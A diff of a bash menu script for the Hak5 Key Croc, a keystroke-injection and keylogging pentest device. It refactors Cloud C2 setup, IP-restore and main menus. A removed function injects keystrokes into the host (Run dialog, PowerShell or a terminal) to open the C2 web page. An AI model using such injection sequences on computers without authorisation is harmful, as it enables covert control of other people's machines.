echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; @@ -5419,45 +7381,8 @@ esac ## #----Hak5 Cloud_C2 start web brower ## -start_web() { -if [ "$(OS_CHECK)" = WINDOWS ]; then - Q GUI d - Q GUI r - sleep 1 - Q STRING "powershell" - Q ENTER - sleep 2 - Q STRING "Start-Process http://$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-); exit" - Q ENTER -else - case $HOST_CHECK in -raspberrypi) - Q GUI d - sleep 1 - Q STRING "LXTerminal" - Q ENTER - Q ENTER - sleep 1 - Q STRING "gio open http://$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-); exit" - Q ENTER ;; -parrot) - Q ALT F2 - sleep 1 - Q STRING "mate-terminal" - Q ENTER - sleep 1 - Q STRING "gio open http://$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-); exit" - Q ENTER ;; -*) - Q ALT F2 - sleep 1 - Q STRING "xterm" - Q ENTER - sleep 1 - Q STRING "gio open http://$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-); exit" - Q ENTER ;; - esac -fi +cloud_web() { + start_web http://$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) } ## #----Hak5 Cloud_C2 reload @@ -5482,7 +7407,8 @@ remove_cloud() { quick_cloud() { local quickcloud=/root/udisk/payloads/Quick_Start_C2.txt clear - echo -ne "$(Info_Screen '-Will need to install Cloud C2 frist on the keycroc + echo -ne "$(Info_Screen ' +-Will need to install Cloud C2 frist on the keycroc -This will install Quick_Start_C2.txt in the payload folder -Use this to start C2 from a payload -Type in startc2 this will automatically start Hak5 cloud C2')\n" @@ -5514,7 +7440,8 @@ fi ## save_ip() { clear - echo -ne "$(Info_Screen '- #1 will save the IP,Netmask,Gateway that is setup with C2 + echo -ne "$(Info_Screen ' +- #1 will save the IP,Netmask,Gateway that is setup with C2 - #2 will restore the keycroc to saved IP,Netmask,Gateway - #3 Manually add IP,Netmask,Gateway')\n" save_setup() { @@ -5575,9 +7502,9 @@ edit_ip() { read_all CHANGE KEYCROC IP Y/N AND PRESS [ENTER] case $r_a in [yY] | [yY][eE][sS]) - echo -ne "$(ColorBlue 'ENTER IP TO BE USED AND PRESS [ENTER] ')"; read ip_e - echo -ne "$(ColorBlue 'ENTER NETMASK TO BE USED AND PRESS [ENTER] ')"; read mask_e - echo -ne "$(ColorBlue 'ENTER GATEWAY TO BE USED AND PRESS [ENTER] ')"; read gate_e + read_all ENTER IP TO BE USED AND PRESS [ENTER] ; ip_e=${r_a} + read_all ENTER NETMASK TO BE USED AND PRESS [ENTER] ; mask_e=${r_a} + read_all ENTER GATEWAY TO BE USED AND PRESS [ENTER] ; gate_e=${r_a} ifconfig wlan0 ${ip_e} netmask ${mask_e}; route add default gw ${gate_e} wlan0; ;; [nN] | [nN][oO]) echo -ne "\n$(ColorYellow 'KEEPING EXISTING SETUP')\n" ;; @@ -5588,81 +7515,31 @@ esac ## #----Hak5 C2 ip restore Menu ## -MenuTitle SAVE C2 SETUP IP MENU -MenuColor 1 SAVE C2 SETUP IP ; echo -ne " ${clear}\n" -MenuColor 2 RESTORE C2 SETUP IP ; echo -ne " ${clear}\n" -MenuColor 3 EDIT CROC IP ; echo -ne " ${clear}\n" -MenuColor 4 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle SAVE C2 SETUP IP MENU ; MenuColor 19 1 SAVE C2 SETUP IP ; MenuColor 19 2 RESTORE C2 SETUP IP ; MenuColor 19 3 EDIT CROC IP ; MenuColor 19 4 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) save_setup ; save_ip ;; - 2) restore_ip ; save_ip ;; - 3) edit_ip ; save_ip ;; - 4) main_menu ;; - 0) exit 0 ;; - [bB]) hak_cloud ;; - *) invalid_entry ; save_ip ;; + 1) save_setup ; save_ip ;; 2) restore_ip ; save_ip ;; 3) edit_ip ; save_ip ;; 4) main_menu ;; 0) exit 0 ;; [bB]) hak_cloud ;; *) invalid_entry ; save_ip ;; esac } ## #----Hak5 Cloud_C2 menu ## -MenuTitle HAK5 CLOUD C2 MENU -MenuColor 1 HAK5 C2 SETUP ; echo -ne " ${clear}\n" -MenuColor 2 START HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 3 RELOAD HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 4 RESTART HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 5 STOP HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 6 REMOVE HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 7 EDIT HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 8 QUICK START C2 ; echo -ne " ${clear}\n" -MenuColor 9 SAVE C2 SETUP IP ; echo -ne " ${clear}\n" -MenuColor 10 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle HAK5 CLOUD C2 MENU ; MenuColor 20 1 HAK5 C2 SETUP ; MenuColor 20 2 START HAK5 C2 ; MenuColor 20 3 RELOAD HAK5 C2 ; MenuColor 20 4 RESTART HAK5 C2 ; MenuColor 20 5 STOP HAK5 C2 +MenuColor 20 6 REMOVE HAK5 C2 ; MenuColor 20 7 EDIT HAK5 C2 ; MenuColor 20 8 QUICK START C2 ; MenuColor 20 9 SAVE C2 SETUP IP ; MenuColor 19 10 RETURN TO MAIN MENU ; MenuEnd 23 case $m_a in - 1) cloud_setup ; hak_cloud ;; - 2) start_web ; hak_cloud ;; - 3) reload_cloud ; hak_cloud ;; - 4) systemctl restart hak5.service ; start_web ; hak_cloud ;; - 5) systemctl stop hak5.service ; hak_cloud ;; - 6) remove_cloud ; hak_cloud ;; - 7) nano /etc/systemd/system/hak5.service ; hak_cloud ;; - 8) quick_cloud ; hak_cloud ;; - 9) save_ip ; hak_cloud ;; - 10) main_menu ;; - [bB]) main_menu ;; - 0) exit 0 ;; - *) invalid_entry ; hak_cloud ;; + 1) cloud_setup ; hak_cloud ;; 2) cloud_web ; hak_cloud ;; 3) reload_cloud ; hak_cloud ;; 4) systemctl restart hak5.service ; cloud_web ; hak_cloud ;; 5) systemctl stop hak5.service ; hak_cloud ;; + 6) remove_cloud ; hak_cloud ;; 7) nano /etc/systemd/system/hak5.service ; hak_cloud ;; 8) quick_cloud ; hak_cloud ;; 9) save_ip ; hak_cloud ;; 10) main_menu ;; [bB]) main_menu ;; 0) exit 0 ;; *) invalid_entry ; hak_cloud ;; esac } ## #----Croc_Pot Main Menu ## function main_menu() { - LED B clear - croc_title -MenuTitle CROC POT MAIN MENU -MenuColor 1 CROC MAIL ; echo -ne " ${blue} ${array[4]} ${clear} \n" -MenuColor 2 CROC POT PLUS ; echo -ne " ${red} ${array[5]} ${clear} \n" -MenuColor 3 KEYCROC STATUS ; echo -ne "${green} ${array[6]} ${clear} \n" -MenuColor 4 KEYCROC LOGS ; echo -ne " ${white} ${array[7]} ${clear} \n" -MenuColor 5 KEYCROC EDIT ; echo -ne " ${yellow} ${array[8]} ${clear} \n" -MenuColor 6 SSH MENU ; echo -ne " ${blue} ${array[9]} ${clear} \n" -MenuColor 7 RECOVERY MENU ; echo -ne " ${green} ${array[10]} ${clear} \n" -MenuColor 8 HAK5 CLOUD C2 ; echo -ne " ${white} ${array[11]} ${clear} \n" -MenuEnd +croc_title ; MenuTitle CROC POT MAIN MENU ; MenuColor 16 1 CROC MAIL | tr -d '\n' ; echo -ne "${blue}${array[4]} ${clear}\n" ; MenuColor 16 2 CROC POT PLUS | tr -d '\n' ; echo -ne "${red}${array[5]} ${clear}\n" +MenuColor 16 3 KEYCROC STATUS | tr -d '\n' ; echo -ne "${green}${array[6]} ${clear}\n" ; MenuColor 16 4 KEYCROC LOGS | tr -d '\n' ; echo -ne "${white}${array[7]} ${clear}\n" ; MenuColor 16 5 KEYCROC EDIT | tr -d '\n' ; echo -ne "${yellow}${array[8]} ${clear}\n" +MenuColor 16 6 SSH MENU | tr -d '\n' ; echo -ne "${cyan}${array[9]} ${clear}\n" ; MenuColor 16 7 RECOVERY MENU | tr -d '\n' ; echo -ne "${pink}${array[10]} ${clear}\n" ; MenuColor 16 8 HAK5 CLOUD C2 | tr -d '\n' ; echo -ne "${white}${array[11]} ${clear}\n" ; MenuEnd 20 case $m_a in - 1) croc_mail ;; - 2) croc_pot_plus ;; - 3) croc_status ;; - 4) croc_logs_mean ;; - 5) croc_edit_menu ;; - 6) ssh_menu ;; - 7) croc_recovery ;; - 8) hak_cloud ;; - 0) exit 0 ;; - *) invalid_entry ; main_menu ;; + 1) croc_mail ;; 2) croc_pot_plus ;; 3) croc_status ;; 4) croc_logs_mean ;; 5) croc_edit_menu ;; 6) ssh_menu ;; 7) croc_recovery ;; 8) hak_cloud ;; 0) exit 0 ;; *) invalid_entry ; main_menu ;; esac } main_menu